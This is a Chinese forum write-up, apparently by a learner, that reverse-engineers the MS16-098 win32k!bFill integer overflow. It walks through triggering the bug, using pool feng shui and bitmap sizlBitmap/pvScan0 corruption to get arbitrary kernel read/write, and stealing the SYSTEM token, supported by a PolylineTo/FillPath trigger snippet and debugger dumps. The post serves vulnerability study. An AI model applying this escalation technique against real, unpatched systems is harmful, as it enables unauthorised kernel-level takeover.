首页
社区
课程
招聘
[原创]补丁分析到滥用GDI对象提权实践
发表于: 2022-6-2 23:37 18816

[原创]补丁分析到滥用GDI对象提权实践

2022-6-2 23:37
18816

我是逆向练习生,羽墨

我正在从0开始学习二进制漏洞,如果你也跟我一样,不妨来看看小白的第一视角

此漏洞编号 CVE-2016-3099 、MS16-098

win8.1 win32k!bFill 函数
左边为修复后,右边为修复前

很明显可以看出,修复后增加了安全的乘法函数,所以呢,修复前的问题大概是乘法导致的溢出

这里可以看到,eax = [rbx+4] = [EPATHOBJ + 4] ,很明显,如果 [rbx+4] 的值能控制,它必定会造成整数溢出,因为它使用32位的寄存器,会截断高位数据,[rbx+4]这个值是什么并不重要,重要的怎么能操作它

经过一番查找与跟踪,最后得到了三环到零环的调用流程

FillPath(HDC hdc) -> NtGdiFillPath(HDC) -> xxx -> EngFillPath -> EngFastFill -> xxx -> bFill调用脆弱的函数

PolylineTo->NtGdiPolyPolyDraw->GrePolylineTo->EPATHOBJ::bPolyLineTo用来溢出

查阅MSDN文档与百度可知,想要调用FillPath函数,需要BeginPath与EndPath函数中间调用绘图函数(猝)

在调用bFill的过程中,会有对于DC句柄的判断,发现DC有几种类型

可以看到内存类型,支持位图上的绘图操作,看起来像是我们需要的,好的,测试一下是否可以到达此函数(当然 使用别的绘图函数一样可以到达)

这份代码并不能到达脆弱函数,经过分析,在bEngFastFillEnum函数中两次对 [EPATHOBJ + 4] 的内容进行判断,而这个内容经过查找资料,就是PATH对象的点数(对GDI开发不懂,貌似是这样。。)

值得一提的是,某个地方会把 [EPATHOBJ + 4] + 1 ,好的,事情就是这样,把points数组弄大一点调用即可(当然,调用别的绘图函数也可以)

修改代码后运行,成功断下

windbg必须使用 ba 命令下断, 不然无法断下 ,断下第一次以后就不会出现无效内存的情况,调用堆栈如下

在我们成功找到到达脆弱函数的方法后,考虑一下如何来控制溢出的值

经过前面的分析,[EPATHOBJ + 4] 是 points数组的大小 ,它的值在于PolylineTo的调用,分析一下

可以看到在这里会对[EPATHOBJ + 4]进行 ADD操作, 源操作数为三环传来的 第三个参数

那么他们的关系会是这样(前面看到过都是使用4字节的寄存器)

0xFFFFFFFF / 3 = 0x5555556

0x5555556 / 3 = 0x3FE01 * 0x156

因式分解后,我们调用156次PolylineTo,并且它的第三个参数应为0x3FE01,所以points数组的数量也是0x3FE01

之前分析过它会+1,所以最后会得到0x55555557 * 3 << 4 = 0x50

所以现在会造成,分配了50字节大小的空间 ,修改代码进行尝试

好的,看来之前的分析是正确的,最后得到了50作为参数去申请内存

查看申请的内存,分页内存池,pool tag为 Gedg ,对象为 EDGE

之后在bFill中释放此内存会蓝屏,原因为 BAD_POOL_HEADER ,应该是因为缓冲区太小,写到范围外了

此时考虑这个溢出写能否控制,如果不能都是废话。。。

首先就是这个函数bConstructGET , 先看一下这个函数的参数

进来以后r8给r15,这是前面溢出申请的内存,把它命名为 buf

这里可以看到内存的情况,rbx像是一个结构体,前面三个8字节的值,然后就是points数组

1F2代表的是points数组的项数,1貌似是一个flag,第一个8字节的地址像是单向链表

这里还可以看到,我们在三环的points数组,在这里值变为了 60200 ,数量也只有1F2个,但是通过add rdi,8可以看出来,这个东西是以8字节为步进,猜测对应三环的point的x和y值

同时rdi指向了一个8字节为0的point,之前分析过,我们的点数会加1,应该就是这个0点了

继续分析

这里在对步进的指针 rdi 与 r14 数组的结束地址 进行判断 , 如果没到结束的地址则一直调用 AddEdgeToGet

好的,进去看看

这里有个分支,可以看到,这里可以通过操控point的值,来达到在 buf+0x28的位置写入 1 或者 FFFFFFFF

但是这个明显没有超过0x50大小的buf,继续分析看看

往下走,会拿rect的两个成员来与point的某些值比较,这里有直接退出的机会

然后比较关键的比较就是这里

这里也有赋值0xFFFFFFFF的机会,但是还没有发现是怎么溢出写的

可以看到在退出的地方,会移动0x30的指针位置,另外一种路线退出则不会移动此指针,也就是说,我们可以通过控制point的xy值,来达到控制写入,写入到附近几个页肯定是没有问题的,在完成写入后,则控制程序流程走左边的路线返回,不会破坏更多的内存

之后返回继续分析

现在找到了溢出写的可能性,申请了0x50的buf,每次添加EDGE结构会加0x30,1F2个能溢出好几个页了

按照正常流程来走,直到1F2个point转换为 EDGE 后 ,会往下面走,结束的条件是线程是否将要被终止,或者rbx的值是否为0,在我调试的过程中,它会出现很多意外的蓝屏,可能这个东西是多线程来操作的?调试影响了线程同步的一些操作?

不清楚 但不影响我们继续

先总结一下如何控制执行流程:

1.第一次进入必定会添加一个EDGE结构,因为系统添加了0点,此时返回的指针+0x30,并且两个临时指针都+8

2.RECT是一个固定的结构,调试可得到数据,想要返回指针不移动,必须让 points[i+1].y < 0 and points[i].y > 0x1F0

3.想要返回的指针移动0x30,只需要避免 points[i+1].y < 0 and points[i].y > 0x1F0 或者 points[i].y > points[i+1].y

4.我们的目标是写入0xFFFFFFFF的值到某个地址(为什么稍后再说),查看写入0xFFFFFFFF的流程,发现只要没有直接退出,那么有几个地方都会被设置为0xFFFFFFFF,分别是

points[i+1].x >= points[i].x 则 buf+0x14 = 0xFFFFFFFF

points[i+1].x < points[i].x 则 buf+0x24 = 0xFFFFFFFF

points[i+1].y < points[i].y 则 buf+0x28 = 0xFFFFFFFF

5.现在可以尝试控制流程来测试我们的分析是否正确,只需查看buf附近的内存即可,还有一个不清楚的地方,为什么被转换为1F2个点,并且值都会增大一个0,是否可以通过三环正常控制

注:以上为初步分析 心里有数即可

首先需要确定的是,三环的点是否对应0环的点,修改代码后测试,数据如下

经过第一步的测试,我们发现0环的点数,确实与三环相对应,且会增大0x10倍,结尾处的值对应第1F1项,推测点数还是0x55555557个不会变

同时这里可以看到,它的首8字节内容是自己,前面分析过,就是根据这个值是否为0来结束循环,所以此处应该是死循环,直到线程即将被结束,好吧,可能有某种线程同步机制?无所谓,并不影响我们利用,只要它能达到预期的目标就行

现在尝试对 buf+0x90的位置进行溢出写操作,根据之前的分析修改代码来进行测试

第一次进入必定会造成 buf 指针移动0x30 ,所以我们在第二次进入时控制它进入移动buf指针的流程,前面分析过,他会与RECT的bottom进行比较,这个值为0x1F0 , 而我们传入的值,在0环会乘0x10 , 并且都是大于0的值,所以只需要简单修改两项的y值即可,这样不出意外,会把buf指针移动到 buf+0x90的位置

现在的数据如下

执行后的返回值

好的,现在到了buf+0x90的位置以后,继续执行,地址并没有增加,这说明我们之前的分析是正确的,决定buf地址是否增加的因素只有

points[i+1].y < 0 || points[i].y > 0x1F0 成立则地址不增加

points[i+1].y >= 0 && points[i].y < 0x1F0 成立则地址增加0x30

现在我们已经可以控制要写到哪个地址,大小应为0x55555557 * 0x30 ,接下来需要确定我们要写入的地址,之前说过要写入0xFFFFFFFF,这是因为需要利用 GDI 对象来实现内核的任意读写

但是想要利用GDI对象,不得不使用内核内存布局的技术,与GDI对象利用的方法,这正是我们接下来要讨论的

这里要使用 bitmap对象来实现内核的任意读写,它在内核中的结构如下所示

要利用的成员为sizlBitmap与pvScan0 ,sizlBitmap 是位图的宽度和高度,pvScan0 是指向位图数据开头的指针

可以通过溢出到sizlBitmap来扩展位图可操作的内存大小,来修改下一个位图对象的pvScan0指针,这样就可以进行任意内存读写了

此处更适合用图片来表达,引用一下图片

简单解释一下,我们可以通过合理的内核内存布局来溢出写入到 bitmapA的sizlBitmap成员,这样bitmapA就可以操作 bitmapB的pvScan0指针,然后再通过bitmapB的pvScan0指针来实现任意内存读写

也就是bitmapA作为管理者的位图,bitmapB作为工作者的位图,管理位图负责控制工作位图的pvScan0指针,工作位图负责去依靠pvScan0指针读写任意内存

外国人把这个技术叫做内核池风水,刚看的时候很奇怪,风水不是中国文化吗。。

这个技术要解决两个问题:

这个技术需要注意的问题:

整理一下利用思路:

1.通过申请与释放GDI对象,使内核分页池的布局在我们的控制中

2.计算分配位置,使溢出的时候,刚好用0xFFFFFFFF覆盖sizlBitmap成员

3.通过三环函数,获取到被溢出修改的对象,使它成为管理对象

4.使用管理对象,修改相邻的bitmap对象的pvScan0指针,使它称为工作对象

5.通过管理对象与工作对象的搭配,达到任意读写内核内存的目的

6.恢复被溢出的pool header等重要数据,防止蓝屏

7.窃取系统进程Token(窃取是指此方法可绕过所有内核安全机制)

布局概览:

引用一个动图来说明

好吧,不得不解决一个问题,GDI对象的大小问题,浅浅分析一下吧

分析过程不提了,最后得到的bitmap在win8.1上面的大小计算公式为

size = (((Width+3) & 0xFFFFFFFC) * Height) + 0x258 经过第一步计算,得到的值必定为4的倍数

size = size % 16 ? size + (0x10 - (size % 16)) : size 第二次计算在申请内存的函数,如果地址不是16字节对齐的,会让它对齐(这部分在内核中实现 我推测的)

最后再加pool header 0x10的大小

分析是在CreateBitmap(x,y ,1, 8, NULL) x y 为变量,后三个参数固定的情况下分析,如果改变,会影响switch case的选择,当然大小计算方式就会改变

bitmap对象的最小值肯定不会低于 0x258+0x10

加速表对象,这是一个用户对象,大小分配计算公式为

size = cAccel * 3 * 2 + 0x22 分析得出

size = size % 16 ? size + (0x10 - (size % 16)) : size 推测得出,前面也是这样,可能内核确实是这样设计的。。

最后再加pool header 0x10的大小

最小值,肯定不会低于0x22+0x10

还需要用到一个与bitmap无关的区域对象(同时它可以用来泄露内核地址,但是也无所谓,泄露内核地址的方法多的是)懒得分析了,测试以后发现,第一个参数与第二个参数为0x79即可申请到0xBC0的大小

有了准确的大小计算公式,风水反而成了最简单的部分

在bFill中申请内存的地方下断,查看返回值

好的好的,现在已经避免了bFill中的释放内存蓝屏,并且我们的溢出利用布局也已经成功

接下来研究一下如何控制溢出,使它正好覆盖到关键数据

首先了解一下bitmap对象的布局

简单说一下对这个玩意的分析,在+258之前的大小,是位图数据所占的大小,+258之后,首先是18字节的BaseObject,然后是50字节的

SURFOBJ64,然后是0x258-0x68大小的一些不知道什么数据

观察pvScan0指针可知,它所指向的位置是在BaseObject为起点,偏移0x258的位置,正好是位图数据,好的,一切那么的合适

所以最终的覆盖sizlBitmap的距离为 0x50 + 0xBC0 + 0x10 + 0x18 + 0x20 = 0xC58

sizlBitmap是两个DWORD值,所以最后覆盖这8字节范围都是可以的

然后根据我们能溢出写0xFFFFFFFF的偏移,来计算应该移动buf指针多少次

buf+0x14 = 0xFFFFFFFF

buf+0x24 = 0xFFFFFFFF

buf+0x28 = 0xFFFFFFFF

还记着之前分析过,总共有三个地方,看哪个地方比较合适

简单计算一下,得到 0x41 * 0x30 = 0xC30 ,刚好有buf+0x28 = 0xFFFFFFFF , 好的,就按这个来构造

前面分析过,第一次是必定会移动指针,所以,我们还需要构造0x40次移动,然后根据分析出来的条件设置数据

好吧,有点乱了,重新整理一下条件

让buf指针不移动的构造

1.points[i+1].y >= points[i].y

2.points[i].y >= 0x1F

让buf指针移动0x30的正常构造:

1.points[i+1].y >= points[i].y

2.points[i+1].y >= 0

3.points[i].y <= 0x1F

4.points[i].y >= 0

5.points[i+1].y >= 0x1F

0xFFFFFFFF的写入且buf指针不移动

1.points[i+1].y < points[i].y

2.points[i+1].y >= 0x1F

你会发现这样刚好满足所有条件,但是结果并不是我们期望中的,虽然成功修改了sizlBitmap,但是很明显,后面还是继续移动buf指针了,这是为什么呢?

我们之前把points[2].y 当成了 points[i].y 来构造,但是points[2].y 作为 points[i+1].y的时候会是什么情况

points[i+1].y = 0x14 造成的判断逻辑:

1.points[i+1].y < points[i].y

2.points[i+1].y >= 0

3.points[i+1].y < 0x1F

有了这三个条件,成功进入了buf指针移动0x30的流程,只不过是设置buf + 0x28 = 0xFFFFFFFF的分支

那接下来修改一下我们的条件,少一半就可以了呗

对比一下修改前后的数据

成功控制溢出,可以看到最后一次修改就是在 buf + 0xC30的位置,大小为0x30,后面数据都没被修改

但是此结构的一些数据被修改

使用GetBitmapBits 获取读取的大小判断即可,如果大小超过我们设置的大小,那么它就是管理位图,下一个就是工作位图

你以为这样就能成功了?呵呵。。。

上述代码调用后,总会出现有一个返回值为0的情况,这是为什么呢,经过一番分析,返回值为0的时候,正好对应被我们溢出的位图,按道理来说读取的数据大小应该会很大,但实际上最后会刚好返回0值

逆向分析GetBitmapBits的底层发现,关键性的计算数据,是创建位图时的bitcount,我们之前使用的是8,现在需要改成32了,同时发现bitmap读取的数据最大值为1FFFFFFE(不详细解释了)

好吧,分析了这么多了,不差再分析一下bitcount为32时的大小计算方式

size = width * 4 * height + 0x258

后面还是正常对齐 , 好的 ,所以申请0x3C0的bitmap时,应该是这样

修改后运行,蓝屏了

这函数我已经分析过了,很简单

rcx是hdev,前面已经被覆盖为00000001`00000000 了,这刚好是个三环地址,在读取0x38的位置时,访问了无效内存导致蓝屏,在这个位置申请内存,并把值设置为1,别让它返回0即可

利用区域对象泄露内核地址,读取这个地址,经过计算偏移,读取正常的pool header把被溢出的部分修改好就行了

有任意读写原语以后,一切都是那么的随意,提权且不蓝,perfect!

首先查看win32kfull!bFill函数,发现与win8.1一模一样的漏洞函数

好吧,不用多说了,经过分析,使用到的GDI对象大小计算方式与win8.1一模一样,所以只需要调整EPROCESS相关偏移

值得一提的是,这个版本的 !pool 命令失效了,原因未知哦

分享使我快乐

 
软件 版本
Vmware win8.1 x64
Vmware win10 v1511 x64
windbg windbg preview
IDA IDA pro
 
 
 
 
 
 
 
 
 
 
HDC hdc = GetDC(NULL);
    HDC hMemDC = CreateCompatibleDC(hdc);
    HGDIOBJ bitmap = CreateBitmap(0x60, 0x20, 1, 32, NULL);
    HGDIOBJ bitobj = SelectObject(hMemDC, bitmap);
 
    static POINT points[2];
 
    for (int i = 0; i < 2; i++) {
        points[i].x = 0x6020;
        points[i].y = 0x6020;
    }
 
    BeginPath(hMemDC);
 
    for (int j = 0; j < 2; j++)
        PolylineTo(hMemDC, points, 2);
 
    EndPath(hMemDC);
    FillPath(hMemDC);
HDC hdc = GetDC(NULL);
    HDC hMemDC = CreateCompatibleDC(hdc);
    HGDIOBJ bitmap = CreateBitmap(0x60, 0x20, 1, 32, NULL);
    HGDIOBJ bitobj = SelectObject(hMemDC, bitmap);
 
    static POINT points[2];
 
    for (int i = 0; i < 2; i++) {
        points[i].x = 0x6020;
        points[i].y = 0x6020;
    }
 
    BeginPath(hMemDC);
 
    for (int j = 0; j < 2; j++)
        PolylineTo(hMemDC, points, 2);
 
    EndPath(hMemDC);
    FillPath(hMemDC);
 
 
 
win32k!bFill
win32k!bEngFastFillEnum+0xcd
win32k!bPaintPath+0xd4
win32k!EngFastFill+0x97
win32k!EngFillPath+0x12c
win32k!EPATHOBJ::bSimpleFill+0x130
win32k!EPATHOBJ::bStrokeAndOrFill+0x2ff
win32k!NtGdiFillPath+0x8e
nt!KiSystemServiceCopyEnd+0x13
win32k!bFill
win32k!bEngFastFillEnum+0xcd
win32k!bPaintPath+0xd4
win32k!EngFastFill+0x97
win32k!EngFillPath+0x12c
win32k!EPATHOBJ::bSimpleFill+0x130
win32k!EPATHOBJ::bStrokeAndOrFill+0x2ff
win32k!NtGdiFillPath+0x8e
nt!KiSystemServiceCopyEnd+0x13
 
 
 
 
 
 
 
 
 
kd> g
Breakpoint 1 hit
win32k!bFill+0x377:
fffff960`00361c77 8d0c40          lea     ecx,[rax+rax*2]
kd> r rax
rax=0000000005555557
 
....
kd> r ecx
ecx = 50
...
 
kd> !pool fffff90141c2a380
Pool page fffff90141c2a380 region is Paged session pool
*fffff90141c2a370 size:   60 previous size:   d0  (Allocated) *Gedg
        Pooltag Gedg : GDITAG_EDGE, Binary : win32k!bFill
kd> g
Breakpoint 1 hit
win32k!bFill+0x377:
fffff960`00361c77 8d0c40          lea     ecx,[rax+rax*2]
kd> r rax
rax=0000000005555557
 
....
kd> r ecx
ecx = 50
...
 
kd> !pool fffff90141c2a380
Pool page fffff90141c2a380 region is Paged session pool
*fffff90141c2a370 size:   60 previous size:   d0  (Allocated) *Gedg
        Pooltag Gedg : GDITAG_EDGE, Binary : win32k!bFill
 
fffff901`67646547 : nt!ExFreePoolWithTag+0x124f
fffff803`22940c6f : win32k!bFill+0x4f0
fffff901`67646547 : nt!ExFreePoolWithTag+0x124f
fffff803`22940c6f : win32k!bFill+0x4f0
 
kd> dq rcx   第一个参数 EPATHOBJ*
ffffd001`5c2bea90  05555557`00000000 fffff901`41e14ba0
ffffd001`5c2beaa0  00000000`00000000 00000000`00000000
ffffd001`5c2beab0  00000000`00000000 00000000`00000000
ffffd001`5c2beac0  ffffe001`00000000 00000000`00000000
 
kd> dq rdx    第二个参数  struct EDGE *
ffffd001`5c2bdcb8  fffffa80`008c23e0 ffff3295`00000001
ffffd001`5c2bdcc8  fffff802`5a71c58b ffff3295`593af6a5
ffffd001`5c2bdcd8  00000000`00000000 0000e001`94bdc880
ffffd001`5c2bdce8  0000d001`5c2be240 0000d001`5b68cc00
 
kd> dq r8   第三个参数  struct EDGE *  这是溢出申请的
fffff901`407bd780  00000000`00000000 00000000`00000000
fffff901`407bd790  fffff901`41c15440 00000000`00000000
fffff901`407bd7a0  00000030`00000000 00000000`0001003b
fffff901`407bd7b0  00000000`00000001 00000000`00000003
 
kd> dd r9  第四个参数 struct _RECTL *
ffffd001`5c2bdd08  fffffb30 00000000 00000019 00000200
ffffd001`5c2bdd18  5a7386d9 fffff802 5b68cc00 ffffd001
kd> dq rcx   第一个参数 EPATHOBJ*
ffffd001`5c2bea90  05555557`00000000 fffff901`41e14ba0
ffffd001`5c2beaa0  00000000`00000000 00000000`00000000
ffffd001`5c2beab0  00000000`00000000 00000000`00000000
ffffd001`5c2beac0  ffffe001`00000000 00000000`00000000
 
kd> dq rdx    第二个参数  struct EDGE *
ffffd001`5c2bdcb8  fffffa80`008c23e0 ffff3295`00000001
ffffd001`5c2bdcc8  fffff802`5a71c58b ffff3295`593af6a5
ffffd001`5c2bdcd8  00000000`00000000 0000e001`94bdc880
ffffd001`5c2bdce8  0000d001`5c2be240 0000d001`5b68cc00
 
kd> dq r8   第三个参数  struct EDGE *  这是溢出申请的
fffff901`407bd780  00000000`00000000 00000000`00000000
fffff901`407bd790  fffff901`41c15440 00000000`00000000
fffff901`407bd7a0  00000030`00000000 00000000`0001003b
fffff901`407bd7b0  00000000`00000001 00000000`00000003
 
kd> dd r9  第四个参数 struct _RECTL *
ffffd001`5c2bdd08  fffffb30 00000000 00000019 00000200
ffffd001`5c2bdd18  5a7386d9 fffff802 5b68cc00 ffffd001
 
 
kd> dd rbx L50    
fffff901`41c37028  41c3a028 fffff901 00000000 00000000
fffff901`41c37038  00000001 000001f2 00000000 00000000     //rdi指向1f2后边的位置
fffff901`41c37048  00060200 00060200 00060200 00060200
fffff901`41c37058  00060200 00060200 00060200 00060200
fffff901`41c37068  00060200 00060200 00060200 00060200
fffff901`41c37078  00060200 00060200 00060200 00060200
fffff901`41c37088  00060200 00060200 00060200 00060200
fffff901`41c37098  00060200 00060200 00060200 00060200
kd> dd rbx L50    
fffff901`41c37028  41c3a028 fffff901 00000000 00000000
fffff901`41c37038  00000001 000001f2 00000000 00000000     //rdi指向1f2后边的位置
fffff901`41c37048  00060200 00060200 00060200 00060200
fffff901`41c37058  00060200 00060200 00060200 00060200
fffff901`41c37068  00060200 00060200 00060200 00060200
fffff901`41c37078  00060200 00060200 00060200 00060200
fffff901`41c37088  00060200 00060200 00060200 00060200
fffff901`41c37098  00060200 00060200 00060200 00060200
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
kd> dq rax-30  //返回值 - 30  正好对应申请的缓冲区
fffff901`407bd780  ffffd001`5c2bdcb8 00000000`00000020
fffff901`407bd790  ffffffff`00000000 00602000`00000000
fffff901`407bd7a0  00000001`00000001 00000000`00000001
fffff901`407bd7b0  00000000`00000001 00000000`00000003
kd> dq rax-30  //返回值 - 30  正好对应申请的缓冲区
fffff901`407bd780  ffffd001`5c2bdcb8 00000000`00000020
fffff901`407bd790  ffffffff`00000000 00602000`00000000
fffff901`407bd7a0  00000001`00000001 00000000`00000001
fffff901`407bd7b0  00000000`00000001 00000000`00000003
 
 
 
 
 
 
 
 
 
 
 
 
 
kd> dq fffff901`407fe028
fffff901`407fe028  fffff901`41c02028 00000000`00000000
fffff901`407fe038  000001f2`00000001 00000000`00000000
fffff901`407fe048  00000010`00000010 00000020`00000020
fffff901`407fe058  00000030`00000030 00000040`00000040
fffff901`407fe068  00000050`00000050 00000060`00000060
fffff901`407fe078  00000070`00000070 00000080`00000080
fffff901`407fe088  00000090`00000090 000000a0`000000a0
fffff901`407fe098  000000b0`000000b0 000000c0`000000c0
 
kd> dq fffff901`407fe028 + 1F4 * 8
fffff901`407fefc8  00001f10`00001f10
kd> dq fffff901`407fe028
fffff901`407fe028  fffff901`41c02028 00000000`00000000
fffff901`407fe038  000001f2`00000001 00000000`00000000
fffff901`407fe048  00000010`00000010 00000020`00000020
fffff901`407fe058  00000030`00000030 00000040`00000040
fffff901`407fe068  00000050`00000050 00000060`00000060
fffff901`407fe078  00000070`00000070 00000080`00000080
fffff901`407fe088  00000090`00000090 000000a0`000000a0
fffff901`407fe098  000000b0`000000b0 000000c0`000000c0
 
kd> dq fffff901`407fe028 + 1F4 * 8
fffff901`407fefc8  00001f10`00001f10
 
 
points[0].y = 0x10;
points[1].y = 0x11;
points[0].y = 0x10;
points[1].y = 0x11;
kd> dd fffff901`400c1028
fffff901`400c1028  407da028 fffff901 00000000 00000000
fffff901`400c1038  00000001 000001f2 00000000 00000000
fffff901`400c1048  00060200 00000100 00060200 00000110
kd> dd fffff901`400c1028
fffff901`400c1028  407da028 fffff901 00000000 00000000
fffff901`400c1038  00000001 000001f2 00000000 00000000
fffff901`400c1048  00060200 00000100 00060200 00000110
bufaddr = fffff90141c464b0
第一次  rax=fffff90141c464e0
第二次  rax=fffff90141c46510
第三次  rax=fffff90141c46540
第四次  rax=fffff90141c46540
第五次     rax=fffff90141c46540
bufaddr = fffff90141c464b0
第一次  rax=fffff90141c464e0
第二次  rax=fffff90141c46510
第三次  rax=fffff90141c46540
第四次  rax=fffff90141c46540
第五次     rax=fffff90141c46540
 

[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!

最后于 2022-6-4 15:59 被yumoqaq编辑 ,原因:
收藏
免费 8
支持
分享
打赏 + 100.00雪花
打赏次数 1 雪花 + 100.00
 
赞赏  Editor   +100.00 2022/07/04 恭喜您获得“雪花”奖励,安全圈有你而精彩!
最新回复 (1)
雪    币: 224
能力值: ( LV1,RANK:0 )
在线值:
发帖
回帖
粉丝
knk
2
膜拜
2022-11-22 19:19
0
游客
登录 | 注册 方可回帖
返回
//